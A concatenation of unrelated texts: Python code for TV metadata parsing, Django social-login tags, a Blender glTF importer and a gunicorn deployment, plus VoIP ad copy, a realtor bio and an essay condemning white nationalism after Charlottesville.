#% (self.Title, self.Network, self.Overview, self.FirstAired, self.Genre, self.ContentRating, self.Rating, self.Episodes, self.EpisodeCount, self.SpecialCount, self.OpedCount, self.Posters) )
logging.Log_Milestone("TvDB" + "_" + id)
class Episode(constants.Episode):
def __init__(self, data, id):
##--------------------------------Title--------------------------------##
if GetElementText(data, "EpisodeName"):
self.Title = str(GetElementText(data, "EpisodeName")).encode('utf-8').strip().translate(constants.ReplaceChars)
##--------------------------------Summary------------------------------##
if GetElementText(data, "Overview"):
self.Summary = GetElementText(data, "Overview")
##--------------------------------Originally_Available_At--------------##
if GetElementText(data, "FirstAired" ):
self.Originally_Available_At = GetElementText(data, "FirstAired")
##--------------------------------Rating-------------------------------##
if GetElementText(data, "Rating"):
self.Rating = GetElementText(data, "Rating")
##--------------------------------Absolute_Index-----------------------##
if GetElementText(data, "absolute_number"):
self.Absolute_Index = int(GetElementText(data, "absolute_number"))
##--------------------------------Writers------------------------------##
if GetElementText(data, "Writer"):
if self.Writers is None: self.Writers = []
self.Writers.append(GetElementText(data, "Writer"))
##--------------------------------Directors----------------------------##
if GetElementText(data, "Director"):
if self.Directors is None: self.Directors = []
self.Directors.append(GetElementText(data, "Director"))
##--------------------------------Producers----------------------------##
##--------------------------------Thumbs-------------------------------##
if GetElementText(data, "filename"):
root = etree.tostring(E.Images(), pretty_print=True, xml_declaration=True, encoding="UTF-8")
root = XML.ElementFromString(root)
bannerPath = GetElementText(data, "filename")
bannerThumb = os.path.splitext(bannerPath)[0] + '_t' + os.path.splitext(bannerPath)[1]
mainUrl, thumbUrl, mainLocalPath, thumbLocalPath = functions.ParseImage(bannerPath, constants.TVDB_IMAGES_URL, os.path.join("TvDB", id, "thumbs"), bannerThumb)
SubElement(root, "Image", id = "1", mainUrl = mainUrl, thumbUrl = thumbUrl, mainLocalPath = mainLocalPath, thumbLocalPath = thumbLocalPath)
self.Thumbs = root
##--------------------------------Number-------------------------------##
if GetElementText(data, "EpisodeNumber"):
self.Number = str(GetElementText(data, "EpisodeNumber")).zfill(2)
##--------------------------------Season-------------------------------##
if GetElementText(data, "SeasonNumber"):
self.Season = str(GetElementText(data, "SeasonNumber")).zfill(2)
|
Compare the best business VoIP providers in Ethel, WV side by side on VoipReview. Find and compare top-rated providers across price, features, ratings, and user-submitted reviews to find the best deal on a business VoIP service. Start comparing below to see how much you can be saving on your monthly phone bill.
What is VoIP for Business in Ethel, WV?
VoIP (Voice over Internet Protocol) for businesses is a phone-based technique intended to satisfy your company's communication requirements. Business VoIP in Ethel, WV works by using your fast-speed web connection to initiate and respond to phone calls and provides companies of all sizes the functions and adaptability that can fulfill each one's demands.
VoIP plans exist for both commercial and household usage in Ethel, WV. What sets them apart is that commercial plans concentrate more on tools and special functions that companies need to be successful, whereas home plans include standard functions and regular in and outbound calling features.
Individuals who are considering business VoIP in Ethel, WV can easily compare the different providers and plans based on a number of criteria ranging from features, monthly pricing, and customer ratings. At VoipReview, we provide easy comparison tools to help people analyze different VoIP providers and find the one that best suits their needs.
Those in Ethel, WV who wish to take the next step and obtain a personalized quote are also in luck because we do all of the work for them. All that's needed is to fill in the above form, and we will instantly provide a list of top VoIP providers in Ethel, WV that meet their requirements.
What is the Difference Between Business VoIP in Ethel, WV and Traditional Phone Service?
Remember that while we always make an effort to provide you with accurate and complete information, prices and included services may sometimes change. For this reason, it is always a good idea to read through the websites of the Ethel, WV residential VoIP providers we present, ensuring you get the most accurate information on what their plans include, prices, terms and limitations of promotional offers and any additional fees that could apply to you. |
# -*- coding: utf-8 -*-
from json import dumps
from django.template import Library
from django.utils.html import escape
from django.utils.safestring import mark_safe
from ..app import settings
from ..models import SocialUserCache, get_user_model
register = Library()
@register.inclusion_tag('oneall/header.html')
def oneall_header():
"""
OneAll required script.
This must go in the ``<head>...</head>`` section of your templates,
otherwise widgets won't load.
"""
return {'oneall_site_name': settings.credentials['site_name']}
@register.inclusion_tag('oneall/social_login.html')
def oneall_social_login(user=None, **kwargs):
"""
This tag displays the Social Login or Social Link widget.
Don't forget to include ``{% oneall_header %}``!
:param user: Logged in user for Social Link mode; if not provided, it's Social Login mode.
:param kwargs: Widget options as documented by OneAll. For example, ``grid_sizes=[8,5]``
"""
if isinstance(user, get_user_model()):
social_user = SocialUserCache.objects.filter(user=user).first()
if social_user:
kwargs['user_token'] = str(social_user.user_token)
else:
user = None # no cached social user, thus revert to social login mode
widget_settings = {}
for key, value in settings.login_widget(kwargs).items():
widget_settings[key] = mark_safe(dumps(value))
return {
'settings': widget_settings,
'mode': 'social_link' if user else 'social_login',
}
@register.inclusion_tag('oneall/social_sharing.html')
def oneall_share(layout='s', **kwargs):
"""
This tag display the `Social Sharing`_ widget.
.. _Social Sharing: https://www.oneall.com/services/social-sharing/
Don't forget to include ``{% oneall_header %}``!
:param layout: Button layout as defined by the Social Sharing Wizard.
:param kwargs: Social link arguments.
"""
layout = str(layout).lower()
if layout not in 'smlhv':
raise ValueError("Invalid layout (%s). Must be one of S M L H or V." % layout)
args = ' '.join(('data-%s="%s"' % (k, escape(v)) for k, v in kwargs.items()))
return {
'layout': layout,
'arguments': mark_safe(args),
'networks': settings.share_widget['networks']
}
|
Quickly and easily switch 2 sets of mouse settings. this is ideal for laptop users that switch between using the touchpad & an external mouse, but want a different pointer speed/sensitivity for each device. Mouse Speed Switcher allows you to quickly and easily switch 2 sets of mouse settings. Mouse Speed Switcher can be used free of charge. However by registering your own copy you will receive a license key that will remove all reminder messages.
Mouse Speed Switcher can be used free of charge. .
Qweas is providing links to Mouse Speed Switcher 3.0.0 as a courtesy, and makes no representations regarding Mouse Speed Switcher or any other applications or any information related thereto.
Any questions, complaints or claims regarding this application Mouse Speed Switcher 3.0.0 must be directed to the appropriate software vendor.
You may click the publisher link of Mouse Speed Switcher on the top of this page to get more details about the vendor. |
from math import pi
from mathutils import Matrix, Quaternion, Vector, Euler
from .compat import mul
from .mesh import mesh_name
# The node graph in glTF needs to fixed up quite a bit before it will work for
# Blender. We first create a graph of "virtual nodes" to match the graph in the
# glTF file and then transform it in a bunch of passes to make it suitable for
# Blender import.
class VNode:
def __init__(self):
# The ID of the glTF node this vnode was created from, or None if there
# wasn't one
self.node_id = None
# List of child vnodes
self.children = []
# Parent vnode, or None for the root
self.parent = None
# (Vector, Quaternion, Vector) triple of the local-to-parent TRS transform
self.trs = (Vector((0, 0, 0)), Quaternion((1, 0, 0, 0)), Vector((1, 1, 1)))
# What type of Blender object will be created for this vnode: one of
# OBJECT, ARMATURE, BONE, or ROOT (for the special vnode that we use the
# turn the forest into a tree to make things easier to process).
self.type = 'OBJECT'
# Dicts of instance data
self.mesh = None
self.camera = None
self.light = None
# If this node had an instance in glTF but we moved it to another node,
# we record where we put it here
self.mesh_moved_to = None
self.camera_moved_to = None
self.light_moved_to = None
# These will be filled out after realization with the Blender data
# created for this vnode.
self.blender_object = None
self.blender_armature = None
self.blender_editbone = None
self.blender_name = None
# The editbone's (Translation, Rotation)
self.editbone_tr = None
self.posebone_s = None
self.editbone_local_to_armature = Matrix.Identity(4)
self.bone_length = 0
# Correction to apply to the original TRS to get the editbone TR
self.correction_rotation = Quaternion((1, 0, 0, 0))
self.correction_homscale = 1
def create_vtree(op):
initial_vtree(op)
insert_armatures(op)
move_instances(op)
adjust_bones(op)
# In the first pass, create the vgraph from the forest from the glTF file,
# making one OBJECT for each node
#
# OBJ
# / \
# OBJ OBJ
# / \
# OBJ OBJ
#
# (The ROOT is also added, but we won't draw it)
def initial_vtree(op):
nodes = op.gltf.get('nodes', [])
op.node_id_to_vnode = {}
# Create a vnode for each node
for node_id, node in enumerate(nodes):
vnode = VNode()
vnode.node_id = node_id
vnode.name = node.get('name', 'nodes[%d]' % node_id)
vnode.trs = get_node_trs(op, node)
vnode.type = 'OBJECT'
if 'mesh' in node:
vnode.mesh = {
'mesh': node['mesh'],
'primitive_idx': None, # use all primitives
'skin': node.get('skin'),
'weights': node.get('weights', op.gltf['meshes'][node['mesh']].get('weights')),
}
if 'camera' in node:
vnode.camera = {
'camera': node['camera'],
}
if 'KHR_lights_punctual' in node.get('extensions', {}):
vnode.light = {
'light': node['extensions']['KHR_lights_punctual']['light'],
}
op.node_id_to_vnode[node_id] = vnode
# Fill in the parent/child relationships
for node_id, node in enumerate(nodes):
vnode = op.node_id_to_vnode[node_id]
for child_id in node.get('children', []):
child_vnode = op.node_id_to_vnode[child_id]
# Prevent cycles
assert(child_vnode.parent == None)
child_vnode.parent = vnode
vnode.children.append(child_vnode)
# Add a root node to make the forest of vnodes into a tree.
op.root_vnode = VNode()
op.root_vnode.type = 'ROOT'
for vnode in op.node_id_to_vnode.values():
if vnode.parent == None:
vnode.parent = op.root_vnode
op.root_vnode.children.append(vnode)
# There is no special kind of node used for skinning in glTF. Joints are just
# regular nodes. But in Blender, only a bone can be used for skinning and bones
# are descendants of armatures.
#
# In the second pass we insert enough ARMATURE vnodes into the vtree so that
# every vnode which is the joint of a skin is a descendant of an ARMATURE. All
# descendants of ARMATURES are then turned into bones.
#
# OBJ
# / \
# OBJ ARMA
# |
# BONE
# / \
# BONE BONE
def insert_armatures(op):
# Insert an armature for every skin
skins = op.gltf.get('skins', [])
for skin_id, skin in enumerate(skins):
armature = VNode()
armature.name = skin.get('name', 'skins[%d]' % skin_id)
armature.type = 'ARMATURE'
# We're going to find a place to insert the armature. It must be above
# all of the joint nodes.
vnodes_below = [op.node_id_to_vnode[joint_id] for joint_id in skin['joints']]
# Add in the skeleton node too (which we hope is an ancestor of the joints).
if 'skeleton' in skin:
vnodes_below.append(op.node_id_to_vnode[skin['skeleton']])
ancestor = lowest_common_ancestor(vnodes_below)
ancestor_is_joint = ancestor.node_id in skin['joints']
if ancestor_is_joint:
insert_above(ancestor, armature)
else:
insert_below(ancestor, armature)
# Walk down the tree, marking all children of armatures as bones and
# deleting any armature which is a descendant of another.
def visit(vnode, armature_ancestor):
# Make a copy of this because we don't want it to change (when we delete
# a vnode) while we're in the middle of iterating it
children = list(vnode.children)
# If we are below an armature...
if armature_ancestor:
# Found an armature descended of another
if vnode.type == 'ARMATURE':
remove_vnode(vnode)
else:
vnode.type = 'BONE'
vnode.armature_vnode = armature_ancestor
else:
if vnode.type == 'ARMATURE':
armature_ancestor = vnode
for child in children:
visit(child, armature_ancestor)
visit(op.root_vnode, None)
# Now we need to enforce Blender's rule that (1) and object may have only one
# data instance (ie. only one of a mesh or a camera or a light), and (2) a bone
# may not have a data instance at all. We also need to move all cameras/lights
# to new children so that we have somewhere to hang the glTF->Blender axis
# conversion they need.
#
#
# OBJ Eg. if there was a mesh and camera on OBJ1
# / \ we will move the camera to a new child OBJ3
# OBJ1 ARMA (leaving the mesh on OBJ1).
# / | And if there was a mesh on BONE2 we will move
# OBJ3 BONE the mesh to OBJ4
# / \
# BONE BONE2
# |
# OBJ4
def move_instances(op):
def move_instance_to_new_child(vnode, key):
inst = getattr(vnode, key)
setattr(vnode, key, None)
if key == 'mesh':
id = inst['mesh']
name = op.gltf['meshes'][id].get('name', 'meshes[%d]' % id)
elif key == 'camera':
id = inst['camera']
name = op.gltf['cameras'][id].get('name', 'cameras[%d]' % id)
elif key == 'light':
id = inst['light']
lights = op.gltf['extensions']['KHR_lights_punctual']['lights']
name = lights[id].get('name', 'lights[%d]' % id)
else:
assert(False)
new_child = VNode()
new_child.name = name
new_child.parent = vnode
vnode.children.append(new_child)
new_child.type = 'OBJECT'
setattr(new_child, key, inst)
setattr(vnode, key + '_moved_to', [new_child])
if key in ['camera', 'light']:
# Quarter-turn around the X-axis. Needed for cameras or lights that
# point along the -Z axis in Blender but glTF says should look along the
# -Y axis
new_child.trs = (
new_child.trs[0],
Quaternion((2**(-1/2), 2**(-1/2), 0, 0)),
new_child.trs[2]
)
return new_child
def visit(vnode):
# Make a copy of this so we don't re-process new children we just made
children = list(vnode.children)
# Always move a camera or light to a child because it needs the
# gltf->Blender axis conversion
if vnode.camera:
move_instance_to_new_child(vnode, 'camera')
if vnode.light:
move_instance_to_new_child(vnode, 'light')
if vnode.mesh and vnode.type == 'BONE':
move_instance_to_new_child(vnode, 'mesh')
for child in children:
visit(child)
visit(op.root_vnode)
# The user can request that meshes be split into their primitives, like this
#
# OBJ => OBJ
# (mesh) / | \
# OBJ OBJ OBJ
# (mesh)(mesh)(mesh)
if op.options['split_meshes']:
def visit(vnode):
children = list(vnode.children)
if vnode.mesh is not None:
num_prims = len(op.gltf['meshes'][vnode.mesh['mesh']]['primitives'])
if num_prims > 1:
new_children = []
for prim_idx in range(0, num_prims):
child = VNode()
child.name = mesh_name(op, (vnode.mesh['mesh'], prim_idx))
child.type = 'OBJECT'
child.parent = vnode
child.mesh = {
'mesh': vnode.mesh['mesh'],
'skin': vnode.mesh['skin'],
'weights': vnode.mesh['weights'],
'primitive_idx': prim_idx,
}
new_children.append(child)
vnode.mesh = None
vnode.children += new_children
vnode.mesh_moved_to = new_children
for child in children:
visit(child)
visit(op.root_vnode)
# Here's the compilcated pass.
#
# Brief review: every bone in glTF has a local-to-parent transform T(b;pose).
# Sometimes we suppress the dependence on the pose and just write T(b). The
# composition with the parent's local-to-parent, and so on up the armature is
# the local-to-armature transform
#
# L(b) = T(root) ... T(ppb) T(pb) T(b)
#
# where pb is the parent of b, ppb is the grandparent, etc. In Blender the
# local-to-armature is
#
# LB(b) = E(root) P(root) ... E(ppb) P(ppb) E(pb) P(pb) E(b) P(b)
#
# where E(b) is a TR transform for the edit bone and P(b) is a TRS transform for
# the pose bone.
#
# NOTE: I am note entirely sure of that formula.
#
# In the rest position P(b;rest) = 1 for all b, so we would like to just make
# E(b) = T(b;rest), but we can't since T(b;rest) might have a scaling, and we
# also want to try to rotate T(b) so we can pick which way the Blender
# octahedorn points.
#
# So we're going to change T(b). For every bone b pick a rotation cr(b) and a
# scalar cs(b) and define the correction matrix for b to be
#
# C(b) = Rot[cr(b)] HomScale[cs(b)]
#
# and transform T(b) to
#
# T'(b) = C(pb)^{-1} T(b) C(b)
#
# If we compute L'(b) using the T'(b), most of the C terms cancel out and we get
#
# L'(b) = L(b) C(b)
#
# This is close enough; we'll be able to cancel off the extra C(b) later.
#
# How do we pick C(b)? Assume we've already computed C(pb) and calculate T'(b)
#
# T'(b)
# = C(pb)^{-1} T(b) C(b)
# = Rot[cr(pb)^{-1}] HomScale[1/cs(pb)]
# Trans[t] Rot[r] Scale[s]
# Rot[cr(b)] HomScale[cs(b)]
# { floating the Trans to the left, combining Rots }
# = Trans[ Rot[cr(pb)^{-1}] t / cs(pb) ]
# Rot[cr(pb)^{-1} r] HomScale[1/cs(pb)] Scale[s]
# Rot[cr(b)] HomScale[cs(b)]
#
# Now assume Scale[s] = HomScale[s] (and s is not 0), ie. the bone has a
# homogeneous scaling. Then we can rearrange this and get
#
# Trans[ Rot[cr(pb)^{-1}] t / cs(pb) ]
# Rot[cr(pb)^{-1} r cr(b)]
# HomScale[s cs(b) / cs(pb)]
#
# Now if we want the rotation to be R we can pick cr(b) = r^{-1} cr(pb) R. We
# also want the scale to be 1, because again, E(b) has a scaling of 1 in Blender
# always, so we pick cs(b) = cs(pb) / s.
#
# Okay, cool, so this is now a TR matrix and we can identify it with E(b).
#
# But what if Scale[s] **isn't** homogeneous? We appear to have no choice but to
# put it on P(b;loadtime) for some non-rest pose we'll set at load time. This is
# unfortunate because the rest pose in Blender won't be the same as the rest
# pose in glTF (and there's inverse bind matrix fallout too).
#
# So in that case we'll take C(b) = 1, and set
#
# E(b) = Trans[ Rot[cr(pb)^{-1}] t / cs(pb) ] Rot[cr(pb)^{-1} r]
# P(b;loadtime) = Scale[s / cs(pb)]
#
# So in both cases we now have LB(b) = L'(b).
#
# TODO: we can still pick a rotation when the scaling is heterogeneous
# Maps an axis into a rotation carrying that axis into +Y
AXIS_TO_PLUS_Y = {
'-X': Euler([0, 0, -pi/2]).to_quaternion(),
'+X': Euler([0, 0, pi/2]).to_quaternion(),
'-Y': Euler([pi, 0, 0]).to_quaternion(),
'+Y': Euler([0, 0, 0]).to_quaternion(),
'-Z': Euler([pi/2, 0, 0]).to_quaternion(),
'+Z': Euler([-pi/2, 0, 0]).to_quaternion(),
}
def adjust_bones(op):
# List of distances between bone heads (used for computing bone lengths)
interbone_dists = []
def visit_bone(vnode):
t, r, s = vnode.trs
cr_pb_inv = vnode.parent.correction_rotation.conjugated()
cs_pb = vnode.parent.correction_homscale
# Trans[ Rot[cr(pb)^{-1}] t / cs(pb) ]
editbone_t = mul(cr_pb_inv, t) / cs_pb
if is_non_degenerate_homscale(s):
# s is a homogeneous scaling (ie. scalar mutliplication)
s = s[0]
# cs(b) = cs(pb) / s
vnode.correction_homscale = cs_pb / s
if op.options['bone_rotation_mode'] == 'POINT_TO_CHILDREN':
# We always pick a rotation for cr(b) that is, up to sign, a permutation of
# the basis vectors. This is necessary for some of the algebra to work out
# in animtion importing.
# General idea: assume we have one child. We want to rotate so
# that our tail comes close to the child's head. Out tail lies
# on our +Y axis. The child head is going to be Rot[cr(b)^{-1}]
# child_t / cs(b) where b is us and child_t is the child's
# trs[0]. So we want to choose cr(b) so that this is as close as
# possible to +Y, ie. we want to rotate it so that its largest
# component is along the +Y axis. Note that only the sign of
# cs(b) affects this, not its magnitude (since the largest
# component of v, 2v, 3v, etc. are all the same).
# Pick the targest to rotate towards. If we have one child, use
# that.
if len(vnode.children) == 1:
target = vnode.children[0].trs[0]
elif len(vnode.children) == 0:
# As though we had a child displaced the same way we were
# from our parent.
target = vnode.trs[0]
else:
# Mean of all our children.
center = Vector((0, 0, 0))
for child in vnode.children:
center += child.trs[0]
center /= len(vnode.children)
target = center
if cs_pb / s < 0:
target = -target
x, y, z = abs(target[0]), abs(target[1]), abs(target[2])
if x > y and x > z:
axis = '-X' if target[0] < 0 else '+X'
elif z > x and z > y:
axis = '-Z' if target[2] < 0 else '+Z'
else:
axis = '-Y' if target[1] < 0 else '+Y'
cr_inv = AXIS_TO_PLUS_Y[axis]
cr = cr_inv.conjugated()
elif op.options['bone_rotation_mode'] == 'NONE':
cr = Quaternion((1, 0, 0, 0))
else:
assert(False)
vnode.correction_rotation = cr
# cr(pb)^{-1} r cr(b)
editbone_r = mul(mul(cr_pb_inv, r), cr)
else:
# TODO: we could still use a rotation here.
# C(b) = 1
vnode.correction_rotation = Quaternion((1, 0, 0, 0))
vnode.correction_homscale = 1
# E(b) = Trans[ Rot[cr(pb)^{-1}] t / cs(pb) ] Rot[cr(pb)^{-1} r]
# P(b;loadtime) = Scale[s / cs(pb)]
editbone_r = mul(cr_pb_inv, r)
vnode.pose_s = s / cs_pb
vnode.editbone_tr = editbone_t, editbone_r
vnode.editbone_local_to_armature = mul(
vnode.parent.editbone_local_to_armature,
mul(Matrix.Translation(editbone_t), editbone_r.to_matrix().to_4x4())
)
interbone_dists.append(editbone_t.length)
# Try getting a bone length for our parent. The length that makes its
# tail meet our head is considered best. Since the tail always lies
# along the +Y ray, the closer we are to the this ray the better our
# length will be compared to the legnths chosen by our siblings. This is
# measured by the "goodness". Amoung siblings with equal goodness, we
# pick the smaller length, so the parent's tail will meet the nearest
# child.
vnode.bone_length_goodness = -99999
if vnode.parent.type == 'BONE':
t_len = editbone_t.length
if t_len > 0.0005:
goodness = editbone_t.dot(Vector((0, 1, 0))) / t_len
if goodness > vnode.parent.bone_length_goodness:
if vnode.parent.bone_length == 0 or vnode.parent.bone_length > t_len:
vnode.parent.bone_length = t_len
vnode.parent.bone_length_goodness = goodness
# Recurse
for child in vnode.children:
if child.type == 'BONE':
visit_bone(child)
# We're on the way back up. Last chance to set our bone length if none
# of our children did. Use our parent's, if it has one. Otherwise, use
# the average inter-bone distance, if its not 0. Otherwise, just use 1
# -_-
if not vnode.bone_length:
if vnode.parent.bone_length:
vnode.bone_length = vnode.parent.bone_length
else:
avg = sum(interbone_dists) / max(1, len(interbone_dists))
if avg > 0.0005:
vnode.bone_length = avg
else:
vnode.bone_length = 1
def visit(vnode):
if vnode.type == 'ARMATURE':
for child in vnode.children:
visit_bone(child)
else:
for child in vnode.children:
visit(child)
visit(op.root_vnode)
# Remember that L'(b) = L(b) C(b)? Remember that we had to move any
# mesh/camera/light on a bone to an object? That's the perfect place to put
# a transform of C(b)^{-1} to cancel out that extra factor!
def visit_object_child_of_bone(vnode):
t, r, s = vnode.trs
# This moves us back along the bone, because for some reason Blender
# puts us at the tail of the bone, not the head
t -= Vector((0, vnode.parent.bone_length, 0))
# Rot[cr^{-1}] HomScale[1/cs] Trans[t] Rot[r] Scale[s]
# = Trans[ Rot[cr^{-1}] t / cs] Rot[cr^{-1} r] Scale[s / cs]
cr_inv = vnode.parent.correction_rotation.conjugated()
cs = vnode.parent.correction_homscale
t = mul(cr_inv, t) / cs
r = mul(cr_inv, r)
s /= cs
vnode.trs = t, r, s
def visit(vnode):
if vnode.type == 'OBJECT' and vnode.parent.type == 'BONE':
visit_object_child_of_bone(vnode)
for child in vnode.children:
visit(child)
visit(op.root_vnode)
# Helper functions below here:
def get_node_trs(op, node):
"""Gets the TRS proerties from a glTF node JSON object."""
if 'matrix' in node:
m = node['matrix']
# column-major to row-major
m = Matrix([m[0:4], m[4:8], m[8:12], m[12:16]])
m.transpose()
loc, rot, sca = m.decompose()
# wxyz -> xyzw
# convert_rotation will switch back
rot = [rot[1], rot[2], rot[3], rot[0]]
else:
sca = node.get('scale', [1.0, 1.0, 1.0])
rot = node.get('rotation', [0.0, 0.0, 0.0, 1.0])
loc = node.get('translation', [0.0, 0.0, 0.0])
# Switch glTF coordinates to Blender coordinates
sca = op.convert_scale(sca)
rot = op.convert_rotation(rot)
loc = op.convert_translation(loc)
return [Vector(loc), Quaternion(rot), Vector(sca)]
def lowest_common_ancestor(vnodes):
"""
Compute the lowest common ancestors of vnodes, ie. the lowest node of which
all the given vnodes are (possibly impromper) descendants.
"""
assert(vnodes)
def ancestor_list(vnode):
"""
Computes the ancestor-list of vnode: the list of all its ancestors
starting at the root and ending at vnode itself.
"""
chain = []
while vnode:
chain.append(vnode)
vnode = vnode.parent
chain.reverse()
return chain
def first_difference(l1, l2):
"""
Returns the index of the first difference in two lists, or None if one is
a prefix of the other.
"""
i = 0
while True:
if i == len(l1) or i == len(l2):
return None
if l1[i] != l2[i]:
return i
i += 1
# Ancestor list for the lowest common ancestor so far
lowest_ancestor_list = ancestor_list(vnodes[0])
for vnode in vnodes[1:]:
cur_ancestor_list = ancestor_list(vnode)
d = first_difference(lowest_ancestor_list, cur_ancestor_list)
if d is None:
if len(cur_ancestor_list) < len(lowest_ancestor_list):
lowest_ancestor_list = cur_ancestor_list
else:
lowest_ancestor_list = lowest_ancestor_list[:d]
return lowest_ancestor_list[-1]
def insert_above(vnode, new_parent):
"""
Inserts new_parent between vnode and its parent. That is, turn
parent -> sister parent -> sister
-> vnode into -> new_parent -> vnode
-> sister -> sister
"""
if not vnode.parent:
vnode.parent = new_parent
new_parent.parent = None
new_parent.children = [vnode]
else:
parent = vnode.parent
i = parent.children.index(vnode)
parent.children[i] = new_parent
new_parent.parent = parent
new_parent.children = [vnode]
vnode.parent = new_parent
def insert_below(vnode, new_child):
"""
Insert new_child between vnode and its children. That is, turn
vnode -> child vnode -> new_child -> child
-> child into -> child
-> child -> child
"""
children = vnode.children
vnode.children = [new_child]
new_child.parent = vnode
new_child.children = children
for child in children:
child.parent = new_child
def remove_vnode(vnode):
"""
Remove vnode from the tree, replacing it with its children. That is, turn
parent -> sister parent -> sister
-> vnode -> child into -> child
-> sister -> sister
"""
assert(vnode.parent) # will never be called on the root
parent = vnode.parent
children = vnode.children
i = parent.children.index(vnode)
parent.children = (
parent.children[:i] +
children +
parent.children[i+1:]
)
for child in children:
child.parent = parent
vnode.parent = None
vnode.children = []
def is_non_degenerate_homscale(s):
"""Returns true if Scale[s] is multiplication by a non-zero scalar."""
largest = max(abs(x) for x in s)
smallest = min(abs(x) for x in s)
if smallest < 1e-5:
# Too small; consider it zero
return False
return largest - smallest < largest * 0.001
|
I moved to Innisfil from the Greater Toronto Area in 1983 with the purpose of raising our three children in a rural setting. Today, all three are happily married, very successful in their careers and I am the proud Nana of four beautiful grandsons, Aiden & Avery (Twins) and Nathaniel and a gorgeous granddaughter Teagan Rose. In 2010 God blessed us with "wee" Adam. He was born very tiny and missing his 21st chromosome. Adam doesn't talk per se, but when he communicates he speaks volumes. The doctors weren't giving anyone hope, but someone actually forgot to tell Adam that, because despite his limitations he is an active little boy. We call him our little miracle. To round off my sixth and lucky number seven grandchild in 2013 and on Valentines Day 2016 I was blessed with two more granddaughters Sofiya Grace and Amelia Rose. Life is busy, but I wouldn't have it any other way.
When real estate isn't keeping me hopping, I like to spend my time with my dog, my kids and grandkids. I love golfing and hope to spend my retirement years travelling the world.
After living in this community, I would never consider moving back to the fast pace of the city.
- Easter Seals Celebrity Golf Tournament. 2006,2007, 2008, and 2010 to present.
- Big Brothers/Sisters Showcase of Homes 2006, 2007,2008,2009 and 2010-2013.
- Spin for Kids for Nantyr Shores Secondary School 2005, 2008.
- Full Moon Dragon Boat Relay for Children's Aid Society 2005 & 2006.
- Dragon Boat Festival for Barrie Public Library 2005, 2006 & 2007.
- Big Brothers/Sisters Bowl for Kids 2003 to 2013.
- Christmas Cheer 2006, 2007 & 2008, 2009.
- Volunteer "Elf" for Santa Claus letter writing campaign through Canada Post.
I am actively involved in the local business community and am a member and past director of the Alcona Business Association.
Need an Air Miles Card? Get it here.
Help Send a Kid to Camp. Easter Seal Canada. |
import os
from fab_deploy2.base import gunicorn as base_gunicorn
from fab_deploy2.tasks import task_method
from fab_deploy2 import functions
from fabric.api import sudo, env
from fabric.contrib.files import append
class Gunicorn(base_gunicorn.Gunicorn):
"""
Install gunicorn and set it up with supervisor.
"""
user = 'www-data'
group = 'www-data'
daemonize = False
conf_location = '/etc/supervisor/conf.d/'
@task_method
def start(self):
functions.execute_on_host('utils.start_or_restart_supervisor', name=self.gunicorn_name)
@task_method
def stop(self):
sudo('supervisorctl stop %s' % self.gunicorn_name)
def _setup_service(self, env_value=None):
installed = functions.execute_on_host('utils.install_package', package_name='supervisor')
if installed:
sudo('update-rc.d supervisor defaults')
if self.conf_location:
gunicorn_conf = os.path.join(env.configs_path,
"gunicorn/supervisor_{0}.conf".format(self.gunicorn_name))
sudo('ln -sf {0} {1}'.format(gunicorn_conf, self.conf_location))
def upload_templates(self):
context = super(Gunicorn, self).upload_templates()
functions.render_template("gunicorn/supervisor_gunicorn.conf",
os.path.join(env.configs_path, "gunicorn/supervisor_{0}.conf".format(self.gunicorn_name)),
context=context)
return context
def _setup_rotate(self, path):
text = [
"%s {" % path,
" copytruncate",
" size 1M",
" rotate 5",
"}"]
sudo('touch /etc/logrotate.d/%s.conf' % self.gunicorn_name)
for t in text:
append('/etc/logrotate.d/%s.conf' % self.gunicorn_name,
t, use_sudo=True)
Gunicorn().as_tasks()
|
Ten days after the white nationalist-inspired Unite the Right rally in Charlottesville, where my family resides, I snapped this selfie: "Me & Lee."
As if sensing the metaphorical moment, the Robert E. Lee statue appears to be hovering, casting its shadow on town, state, and country.
Among the "alt-right" crowd, it is hard for me to find any actual, comprehensive vision to heal—to mend the fissures and fractures of American society; to redeem the breadth and width of our social story.
There is—devastatingly—no love outside oneself, one's race, one's culture.
There is only misguided intellect masquerading and marauding as cultural grievance and the naked will to power.
There are only the recycled temptations of social Darwinism's ever-present end-game: competition, conflict, supremacy, exclusion.
Now, like many Americans, I continue to process August 12th and its aftermath.
On the night Donald Trump won America, CNN's Van Jones unleashed his now-famous "whitelash" comment—a visceral analysis of the U.S. election results.
Jones's three-sentence commentary channeled the larger forces of globalization and multiculturalism as much as it did race/racism in America's social history and ongoing story.
But, after Charlottesville, with many Americans appalled, anguished, angered, all of the above, you can forgive the lack of discussion on, say, the strengths and weaknesses of the global economic order.
Whitelash had indeed vociferously announced the above-ground presence of its militant faction—with the tacit support and seeming approval of the White Man in the White House.
...a direct consequence of long-simmering tensions in American race relations and our national unwillingness to state unequivocally that the Confederacy was the villain of the Civil War, enabling revisionist histories that cast it as the victim. For all our protestations that this is not the America we know, this brand of racism and white supremacism is in our country’s very DNA.
At the direction of the Charlottesville City Council, the Robert E. Lee statue in Emancipation Park was shrouded on August 23, intended to represent the city's mourning of Heather Heyer.
Notwithstanding the incessant volume emanating from the diatribes of a gazillion Facebook posts, this political hubbub and its immense social moment is not about preserving monuments.
The battle has never been about the statues themselves.
Put frankly, as Ed Kilgore writes, this is about "the fierce, century-long effort of the Southern ruling class to normalize white racism so long as [it doesn't] degenerate into extralegal violence."
To keep white racism normal.
Whatever color you are, one should not need an empathy gene to feel this cut against the soul.
A white nationalist demonstrator struck a defiant pose at the Unite the Right rally in Charlottesville.
Leaving to the side the blatant co-opting of Nazi rhetoric and imagery for the sake of its own budding narrative, "alt-right" ideology has as its real white noise the heritage that stands in for hate.
Or, seen less dimly now: the hate that uses heritage—like a freaking tool.
In fact, I would venture a wager that most of the fellas gathering under the big-tent "alt-right" could care less about the Lost Cause of the Confederacy.
They are not concerned in the least with Southern identity.
For white nationalists and neo-Nazis, there is no cause greater than white.
No identity (Southern, American, Christian) matters more than white.
Be assured, they just want to use your Confederate love tonight. |
import sys
import math
import random
import traceback
import maya.mel as mel
import pymel.core as pm
import maya.OpenMaya as OpenMaya
import maya.OpenMayaMPx as OpenMayaMPx
import maya.OpenMayaRender as OpenMayaRender
kPluginCmdName = "instanceAlongCurve"
kPluginNodeName = 'instanceAlongCurveLocator'
kPluginNodeClassify = 'utility/general'
kPluginNodeId = OpenMaya.MTypeId( 0x55555 )
# InstanceAlongCurve v1.0.2
class instanceAlongCurveLocator(OpenMayaMPx.MPxLocatorNode):
# Simple container class for compound vector attributes
class Vector3CompoundAttribute(object):
def __init__(self):
